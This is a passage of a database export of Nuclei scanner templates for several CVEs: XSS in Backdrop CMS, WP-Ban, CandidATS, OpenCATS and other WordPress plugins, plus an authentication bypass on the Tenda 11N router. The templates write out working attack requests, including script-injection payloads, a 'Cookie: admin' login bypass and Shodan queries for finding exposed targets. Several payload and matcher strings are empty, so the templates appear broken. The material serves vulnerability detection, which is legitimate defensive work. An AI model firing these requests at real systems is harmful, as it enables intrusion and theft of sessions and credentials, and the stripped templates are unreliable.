reference:\n - https://github.com/backdrop/backdrop/releases/tag/1.23.0\n - https://github.com/bypazs/CVE-2022-42096\n - https://nvd.nist.gov/vuln/detail/CVE-2022-42096\n - https://backdropcms.org\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2022-42096\n cwe-id: CWE-79\n epss-score: 0.00345\n epss-percentile: 0.68611\n cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 5\n vendor: backdropcms\n product: backdrop_cms\n tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms\n\nhttp:\n - raw:\n - |\n GET /?q=user/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /?q=user/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n - |\n GET /?q=node/add/post HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /?q=node/add/post HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp\n\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"title\"\n\n {{randstr}}\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"field_tags[und]\"\n\n {{randstr}}\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"body[und][0][summary]\"\n\n\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"body[und][0][value]\"\n\n \n\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"body[und][0][format]\"\n\n full_html\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\n Content-Type: application/octet-stream\n\n\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n 0\n 
------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n 1\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"changed\"\n\n\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"form_build_id\"\n\n {{form_id_1}}\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"form_token\"\n\n {{form_token}}\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"form_id\"\n\n {{form_id_2}}\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"status\"\n\n 1\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"scheduled[date]\"\n\n 2023-04-25\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"scheduled[time]\"\n\n 16:59:23\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"promote\"\n\n 1\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"name\"\n\n {{name}}\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"date[date]\"\n\n 2023-04-24\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"date[time]\"\n\n 16:59:23\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"path[auto]\"\n\n 1\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"comment\"\n\n 2\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n ------WebKitFormBoundaryIubltUxssi0yqDjp\n Content-Disposition: form-data; name=\"op\"\n\n Save\n ------WebKitFormBoundaryIubltUxssi0yqDjp--\n - |\n GET /?q=posts/{{randstr}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \n - Backdrop CMS\n condition: and\n\n - type: status\n status:\n 
- 200\n\n extractors:\n - type: regex\n name: form_id_1\n group: 1\n regex:\n - name=\"form_build_id\" value=\"(.*)\"\n internal: true\n\n - type: regex\n name: name\n group: 1\n regex:\n - name=\"name\" value=\"(.*?)\"\n internal: true\n\n - type: regex\n name: form_id_2\n group: 1\n regex:\n - name=\"form_id\" value=\"(.*)\"\n internal: true\n\n - type: regex\n name: form_token\n group: 1\n regex:\n - name=\"form_token\" value=\"(.*)\"\n internal: true\n# digest: 4a0a00473045022100d511f8ca03bfd62c3ce9d4eb61ca34977675265bb516ecfc806a64e8785b81d6022041909cc1f36dc06c223ccc56a5e642045be29cfddd45f69658f28149169cf16e:922c64590222798bb761d5b6d8e72950", "hash": "13cc5da2b17b2458c93253dfb8cf7b2a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a1" }, "name": "CVE-2022-42233.yaml", "content": "id: CVE-2022-42233\n\ninfo:\n name: Tenda 11N - Authentication Bypass\n author: For3stCo1d\n severity: critical\n description: |\n Tenda 11N with firmware version V5.07.33_cn contains an authentication bypass vulnerability. 
A request to /index.asp that carries the header Cookie: admin (which is what this template sends, with no credentials at all) is answered with the authenticated configuration page; the template confirms the bypass by finding def_wirelesspassword in the response. An unauthenticated attacker can therefore obtain sensitive information, modify data, and/or execute unauthorized administrative operations on the affected device.\n remediation: |\n Apply the latest firmware update provided by Tenda to fix the authentication bypass vulnerability (CVE-2022-42233).\n reference:\n - https://github.com/D0ngsec/vulns/blob/main/Tenda/Tenda_11N_Authentication_Bypass.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-42233\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-42233\n cwe-id: CWE-287\n epss-score: 0.87277\n epss-percentile: 0.9839\n cpe: cpe:2.3:o:tenda:11n_firmware:5.07.33_cn:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: tenda\n product: 11n_firmware\n shodan-query: http.title:\"Tenda 11N\"\n fofa-query: product==\"Tenda-11N-Wireless-AP\"\n tags: cve,cve2022,tenda,auth-bypass,router,iot\n\nhttp:\n - raw:\n - |\n GET /index.asp HTTP/1.1\n Host: {{Hostname}}\n Cookie: admin\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'def_wirelesspassword'\n - 'Tenda 11N'\n case-insensitive: true\n condition: and\n\n - type: word\n part: header\n words:\n - 'GoAhead-Webs'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b86e4c63dbaa65f20b84e2935e6d84f986fd943c6f626ad3a2d1b00526ea1d4c022071e2e1880c20e23bb3959dfd91cb4b52727a1129c9cc198ff74b8e5674d0c96a:922c64590222798bb761d5b6d8e72950", "hash": "3bbbf0385fc825d9bc834272cc24dd15", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a2" }, "name": "CVE-2022-4260.yaml", "content": "id: CVE-2022-4260\n\ninfo:\n name: WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting\n author: Hardik-Solanki\n severity: medium\n description: |\n WordPress WP-Ban plugin before 1.69.1 contains a stored cross-site 
scripting vulnerability. The plugin does not sanitize and escape some of its settings (this template stores the payload in the ban template message), so a high-privilege user can persist script that runs in the browser of any visitor the plugin blocks, allowing the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be exploited even when the unfiltered_html capability is disallowed, for example in a multisite setup. Note: the template logs in with the supplied credentials and saves new plugin settings (a banned referer of XSS and the injected template message) without restoring them, so it is intrusive and the settings should be reverted after testing.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or further compromise of the affected system.\n remediation: Fixed in version 1.69.1\n reference:\n - https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260\n - https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2022-4260\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.38207\n cpe: cpe:2.3:a:wp-ban_project:wp-ban:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: wp-ban_project\n product: wp-ban\n framework: wordpress\n tags: cve,cve2022,wp-plugin,xss,wordpress,wpscan,wp,authenticated,wp-ban,wp-ban_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1\n Host: {{Hostname}}\n\n 
_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n Referer: XSS\n\n host-redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_4, \"\")'\n - 'contains(content_type_4, \"text/html\")'\n - 'status_code_4 == 200'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - '_wpnonce=([0-9a-z]+)'\n internal: true\n part: body\n# digest: 4a0a00473045022054e0cb92b1de30b9a6096c941364f4ef3dd2f229205099d8588224ea2f58f6c7022100ff925bcaa75297254f5780ad4137c14bd3e834a259440ea032f8b9a86bfc8fb1:922c64590222798bb761d5b6d8e72950", "hash": "58581a8d64277ee574d8124ccc6f8df0", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a3" }, "name": "CVE-2022-42746.yaml", "content": "id: CVE-2022-42746\n\ninfo:\n name: CandidATS 3.0.0 - Cross-Site Scripting.\n author: arafatansari\n severity: medium\n description: |\n CandidATS 3.0.0 contains a cross-site scripting vulnerability via the indexFile parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS.\n reference:\n - https://fluidattacks.com/advisories/modestep/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-42746\n - https://candidats.net/\n - https://github.com/Henry4E36/POCS\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-42746\n cwe-id: CWE-79\n epss-score: 0.00109\n epss-percentile: 0.42811\n cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: auieo\n product: candidats\n shodan-query: http.html:\"CandidATS\"\n tags: cve,cve2022,candidats,xss,auieo\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'candidat'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 404\n# digest: 4a0a00473045022100e05a50a6e132bac1f32ae519749f19608d564459b4cf2f5bc78878bc392979d802205e3df75d54d4f3d858178677f1d15edc59f2dcba8a7121a985e690d1131a06b9:922c64590222798bb761d5b6d8e72950", "hash": "51e7da4c4596e5005fb718a165fad1b9", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a4" }, "name": "CVE-2022-42747.yaml", "content": "id: CVE-2022-42747\n\ninfo:\n name: CandidATS 3.0.0 
- Cross-Site Scripting.\n author: arafatansari\n severity: medium\n description: |\n CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortBy parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the application.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS.\n reference:\n - https://fluidattacks.com/advisories/modestep/\n - https://fluidattacks.com/advisories/jcole/\n - https://candidats.net/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-42747\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-42747\n cwe-id: CWE-79\n epss-score: 0.00109\n epss-percentile: 0.43507\n cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: auieo\n product: candidats\n shodan-query: http.html:\"CandidATS\"\n tags: cve,cve2022,candidats,xss,auieo\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortDirection=desc&indexFile=1&isPopup=0'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'candidat'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 404\n# digest: 
4a0a004730450220674c64cb82f47fccf84aa02992e2383beb4ef86186c3540610bd5302bbaeb13e0221008dd0a1ac41467e3520b176248f8c8292dfdabd050f6915f34a0a248f760782b2:922c64590222798bb761d5b6d8e72950", "hash": "e9ad2d1058169d33defb975ad6803ad0", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a5" }, "name": "CVE-2022-42748.yaml", "content": "id: CVE-2022-42748\n\ninfo:\n name: CandidATS 3.0.0 - Cross-Site Scripting.\n author: arafatansari\n severity: medium\n description: |\n CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortDirection parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.\n reference:\n - https://fluidattacks.com/advisories/modestep/\n - https://fluidattacks.com/advisories/jcole/\n - https://candidats.net/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-42748\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-42748\n cwe-id: CWE-79\n epss-score: 0.00109\n epss-percentile: 0.42811\n cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: auieo\n product: candidats\n shodan-query: http.html:\"CandidATS\"\n tags: cve,cve2022,candidats,xss,auieo\n\nhttp:\n - method: GET\n path:\n - 
'{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'candidat'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 404\n# digest: 4a0a00473045022100bb5ffd4b21e445cf4234b76fc85113266a75cdbb2da6bb13444795dc3af242f1022022a7de122c708996659ebc47a7766409e68978393245344a63e8f68221e40060:922c64590222798bb761d5b6d8e72950", "hash": "b264e2475e10ea535b167ab3b690fb0a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a6" }, "name": "CVE-2022-42749.yaml", "content": "id: CVE-2022-42749\n\ninfo:\n name: CandidATS 3.0.0 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n CandidATS 3.0.0 contains a cross-site scripting vulnerability via the page parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS.\n reference:\n - https://fluidattacks.com/advisories/modestep/\n - https://fluidattacks.com/advisories/jcole/\n - https://candidats.net/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-42749\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-42749\n cwe-id: CWE-79\n epss-score: 0.00109\n epss-percentile: 0.42811\n cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: auieo\n product: candidats\n shodan-query: http.html:\"CandidATS\"\n tags: cve,cve2022,candidats,xss,auieo\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'candidat'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n condition: and\n\n - type: status\n status:\n - 404\n# digest: 4a0a0047304502210089fe04a15e4eed93eec92622f8f739ff1ae8fbf29d5bbed7f4d299bb7ea9e38a0220668d4c0c8de7a37e6d9c004beb28ba0b5f40262c4252936318e4798275678c65:922c64590222798bb761d5b6d8e72950", "hash": "2fa4f685e354f610f41fbe933992dd6e", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a7" }, "name": "CVE-2022-4295.yaml", 
"content": "id: CVE-2022-4295\n\ninfo:\n name: Show all comments < 7.0.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the Show all comments plugin (7.0.1) or apply the vendor-supplied patch to fix the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/4ced1a4d-0c1f-42ad-8473-241c68b92b56\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4295\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-4295\n cwe-id: CWE-79\n epss-score: 0.00097\n epss-percentile: 0.40181\n cpe: cpe:2.3:a:appjetty:show_all_comments:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: appjetty\n product: show_all_comments\n framework: wordpress\n publicwww-query: /wp-content/plugins/show-all-comments-in-one-page\n tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"\")'\n - 'contains(body, \"Select \")'\n condition: and\n# digest: 4a0a0047304502203dbda7150adc50b6dfb1c523f72b257beda768f3910e46959f2b0ab81f805ae8022100becbd420e250bfaf91f33df4b6663c17f4a2fe2f82e4c1790a3b7f0f2476e7a7:922c64590222798bb761d5b6d8e72950", "hash": 
"228cda91b2d7c2f61ebaac7220601a14", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a8" }, "name": "CVE-2022-4301.yaml", "content": "id: CVE-2022-4301\n\ninfo:\n name: WordPress Sunshine Photo Cart <2.9.15 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Sunshine Photo Cart plugin before 2.9.15 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 2.9.15.\n reference:\n - https://wpscan.com/vulnerability/a8dca528-fb70-44f3-8149-21385039179d\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4301\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-4301\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45193\n cpe: cpe:2.3:a:sunshinephotocart:sunshine_photo_cart:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: sunshinephotocart\n product: sunshine_photo_cart\n framework: wordpress\n tags: cve2022,cve,xss,sunshine,wordpress,wp-plugin,wpscan,unauth,sunshinephotocart\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 
'Registration Form'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022004861bd06361905004a5a3a5fd6715270499b87d1113acf26602abe2cca52cce0221009a6dcf1e34ccf2f1cd18759061c384d5b62637883e9d2c2b0652467c6edb44fd:922c64590222798bb761d5b6d8e72950", "hash": "7bc97ca1a1e31f0aaa7c7d492becdf86", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a9" }, "name": "CVE-2022-43014.yaml", "content": "id: CVE-2022-43014\n\ninfo:\n name: OpenCATS 0.9.6 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the joborderID parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of OpenCATS or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_joborderID.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43014\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-43014\n cwe-id: CWE-79\n epss-score: 0.00099\n epss-percentile: 0.39871\n cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: opencats\n product: opencats\n shodan-query: title:\"OpenCATS\"\n tags: 
cve2022,cve,xss,opencats,authenticated\n\nhttp:\n - raw:\n - |\n POST /index.php?m=login&a=attemptLogin HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n GET /ajax.php?f=getPipelineJobOrder&joborderID=1)\">
    %20&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'CATS='\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c667dbcf839a9b9666df759b351aa9863dd80927da1c754456cb38c9f1d2c74f022100b3f9f463cf96b3f9aca85d17122255bfe96dda694721022db00ae6e73b6701b5:922c64590222798bb761d5b6d8e72950", "hash": "6fa8e3005a43b0629cf2c424169ef807", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085aa" }, "name": "CVE-2022-43015.yaml", "content": "id: CVE-2022-43015\n\ninfo:\n name: OpenCATS 0.9.6 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the entriesPerPage parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue.\n reference:\n - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_entriesPerPage.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43015\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-43015\n cwe-id: CWE-79\n epss-score: 0.00099\n epss-percentile: 0.39871\n cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: opencats\n product: opencats\n shodan-query: title:\"OpenCATS\"\n tags: cve,cve2022,xss,opencats,authenticated\n\nhttp:\n - raw:\n - |\n POST /index.php?m=login&a=attemptLogin HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)\">%20&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'MySQL Query Failed'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 
490a0046304402207e5d9a4f267de600ae65549cbff97de0d51d050c89c4fef7fc2310d605343dfb02203c9e7bc08b6191c455ed70968efc3fb33378ad50795931fe96f85b24732fc83b:922c64590222798bb761d5b6d8e72950", "hash": "261bedd498690d1ff385b6186b3a9f05", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ab" }, "name": "CVE-2022-43016.yaml", "content": "id: CVE-2022-43016\n\ninfo:\n name: OpenCATS 0.9.6 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the callback component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply 